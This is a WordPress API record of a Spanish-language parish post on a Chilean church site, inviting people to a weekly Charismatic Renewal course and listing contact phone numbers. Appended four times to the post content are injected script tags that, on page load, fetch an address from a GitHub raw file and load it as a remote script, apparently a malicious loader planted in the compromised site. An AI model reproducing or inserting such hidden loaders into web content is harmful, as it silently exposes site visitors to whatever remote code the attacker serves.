{"id":339,"date":"2024-12-23T16:24:55","date_gmt":"2024-12-23T20:24:55","guid":{"rendered":"http:\/\/www.anunciacion.cl\/?p=339"},"modified":"2025-01-07T22:18:15","modified_gmt":"2025-01-08T02:18:15","slug":"todos-invitados-a-participar-de-la-escuela-de-crecimiento-en-el-espiritu-santo","status":"publish","type":"post","link":"https:\/\/www.anunciacion.cl\/?p=339","title":{"rendered":"Todos invitados a participar de la Escuela de Crecimiento en el Esp\u00edritu Santo"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<p>Renovaci\u00f3n Carism\u00e1tica invita a la comunidad de La Anunciaci\u00f3n y a todos los interesados a unirse a la Escuela de Crecimiento en el Esp\u00edritu Santo, que se realizar\u00e1 todos los martes del mes partiendo el 23 de abril, de 19:00 a 21:00 horas. <\/p>\n\n\n\n<p>M\u00e1s informaci\u00f3n e inscripciones a los tel\u00e9fonos +56 9 82782967 y 226970150.<\/p>\n\n\n\n<p>\u00a1Bienvenidos!<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img fetchpriority=\"high\" decoding=\"async\" width=\"767\" height=\"1024\" src=\"http:\/\/www.anunciacion.cl\/wp-content\/uploads\/2019\/03\/IMG-20190328-WA0020-767x1024.jpg\" alt=\"\" class=\"wp-image-340\" srcset=\"https:\/\/www.anunciacion.cl\/wp-content\/uploads\/2019\/03\/IMG-20190328-WA0020-767x1024.jpg 767w, https:\/\/www.anunciacion.cl\/wp-content\/uploads\/2019\/03\/IMG-20190328-WA0020-225x300.jpg 225w, https:\/\/www.anunciacion.cl\/wp-content\/uploads\/2019\/03\/IMG-20190328-WA0020-768x1025.jpg 768w, https:\/\/www.anunciacion.cl\/wp-content\/uploads\/2019\/03\/IMG-20190328-WA0020.jpg 959w\" sizes=\"(max-width: 767px) 100vw, 767px\" \/><\/figure>\n\n\n\n<p>  <\/p>\n<script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script>","protected":false},"excerpt":{"rendered":"<p>Renovaci\u00f3n Carism\u00e1tica invita a la comunidad de La Anunciaci\u00f3n y a todos los interesados a unirse a la Escuela de Crecimiento en el Esp\u00edritu Santo, que se realizar\u00e1 todos los martes del mes partiendo el 23 de abril, de 19:00 a 21:00 horas. M\u00e1s informaci\u00f3n e inscripciones a los tel\u00e9fonos +56 9 82782967 y 226970150. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-339","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/www.anunciacion.cl\/index.php?rest_route=\/wp\/v2\/posts\/339","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.anunciacion.cl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.anunciacion.cl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.anunciacion.cl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.anunciacion.cl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=339"}],"version-history":[{"count":5,"href":"https:\/\/www.anunciacion.cl\/index.php?rest_route=\/wp\/v2\/posts\/339\/revisions"}],"predecessor-version":[{"id":2315,"href":"https:\/\/www.anunciacion.cl\/index.php?rest_route=\/wp\/v2\/posts\/339\/revisions\/2315"}],"wp:attachment":[{"href":"https:\/\/www.anunciacion.cl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=339"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.anunciacion.cl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=339"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.anunciacion.cl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=339"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}